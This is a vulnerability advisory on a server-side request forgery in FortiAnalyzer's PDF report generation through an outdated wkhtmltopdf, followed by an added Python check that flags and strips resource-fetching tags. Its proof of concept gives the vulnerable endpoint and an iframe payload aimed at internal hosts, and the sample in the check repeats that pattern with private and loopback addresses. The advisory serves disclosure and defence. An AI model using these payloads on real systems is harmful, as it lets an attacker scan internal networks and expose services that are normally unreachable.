Overview
PDF report generation on the FortiAnalyzer contains a vulnerability that allows a remote authenticated user to make the FortiAnalyzer issue web requests to web services on its local network and any network it can reach. The responses to these requests are displayed in the rendered PDF.
Details
By performing this Server Side Request Forgery (SSRF), an attacker can gain access to information and web services that are normally not accessible. The attacker can also anonymize malicious actions by having the FortiAnalyzer execute them.
Proof of Concept
On the FortiAnalyzer, navigating to the FortiViews functionality and then to Top Threat allows the generation of a PDF summarizing the data viewed.
The generation of the PDF notably involves sending HTML data in a POST request to the entry point /p/fortiview/download/pdf/.
Upon receipt of this data, the server returns a PDF file containing the HTML data sent. The metadata of the generated PDF notably records the software used to generate the PDF from the HTML code, together with its version: wkhtmltopdf 0.12.6-dev
This version is outdated and affected by a publicly known vulnerability. This weakness was used to insert HTML code that the server interprets to request neighboring resources (local network web services) and display the obtained responses in the rendered PDF.
HTML code sent as the POST parameter:
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
To be correctly interpreted by the PDF generator, this code must be URL-encoded before being sent.
The HTML code is interpreted by the server-side PDF generator, which requests the specified web resources and inserts the obtained responses into the generated PDF. This allows the attacker to scan neighboring web services (or any network reachable by the FortiAnalyzer).
The above evidence shows multiple valid responses obtained from servers on the attacked FortiAnalyzer's local network.
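As an added defensive example (not part of the original advisory and not FortiAnalyzer's own code): the check below decodes a URL-encoded POST body of the kind described above, lists the resource-fetching tags that would make an HTML-to-PDF renderer such as wkhtmltopdf contact internal hosts, and shows the mitigation of stripping those tags before rendering. The sample body and the addresses in it are constructed; the tag list and the "internal host" rule are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote, urlparse

# Constructed sample: a URL-encoded HTML body built from the same iframe
# pattern the advisory shows (addresses are placeholders, not real targets).
SAMPLE_BODY = (
    "%3Ciframe%20src%3D%22http%3A%2F%2F10.0.0.5%2F%22%20height%3D500%20width%3D500%3E%3C%2Fiframe%3E%0A"
    "%3Cimg%20src%3D%22https%3A%2F%2Fexample.com%2Flogo.png%22%3E%0A"
    "%3Ciframe%20src%3D%27http%3A%2F%2F127.0.0.1%3A8080%2Fadmin%27%3E%3C%2Fiframe%3E"
)

# Elements through which an HTML-to-PDF renderer fetches further resources;
# each of them can be abused to make the server issue requests on the user's behalf.
RESOURCE_TAG = re.compile(
    r'<(iframe|img|object|embed|link|script)\b[^>]*?\b(?:src|href|data)\s*=\s*["\']?([^"\'\s>]+)',
    re.IGNORECASE,
)

def is_internal_target(url):
    """True if the URL points at the renderer's own host, a local file, or a private network."""
    parsed = urlparse(url)
    if parsed.scheme.lower() == "file":
        return True
    host = parsed.hostname or ""
    if host.lower() == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name (or relative path); not classified here
    return addr.is_private or addr.is_loopback or addr.is_link_local

def find_ssrf_targets(encoded_body):
    """Decode a URL-encoded POST body and return (tag, url) pairs that would
    make the PDF generator fetch an internal resource."""
    html = unquote(encoded_body)
    return [(tag.lower(), url) for tag, url in RESOURCE_TAG.findall(html)
            if is_internal_target(url)]

def strip_resource_tags(html):
    """Mitigation: remove resource-fetching elements (and their bodies) before rendering."""
    pattern = r'<(iframe|img|object|embed|link|script)\b[^>]*>(?:.*?</\1\s*>)?'
    return re.sub(pattern, "", html, flags=re.IGNORECASE | re.DOTALL)

if __name__ == "__main__":
    for tag, url in find_ssrf_targets(SAMPLE_BODY):
        print(f"flagged <{tag}> fetching internal resource {url}")
```

Server-side, the same checks belong in front of the renderer, together with running it with outbound network access restricted to what report generation actually needs.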
Solution
Security patch
Upgrade to a fixed version, as described in the Fortinet Security Advisory.
References
https://nvd.nist.gov/vuln/detail/CVE-2023-44256
https://www.fortiguard.com/psirt/FG-IR-19-039
Credits
Mickael Dorigny at Orange Cyberdéfense
For Hélène Saliou, Frédéric Prevost, François-Xavier Picard at Orange group
Orange CERT-CC at Orange group
Timeline
Date reported: May 31, 2023
Date fixed: October 10, 2023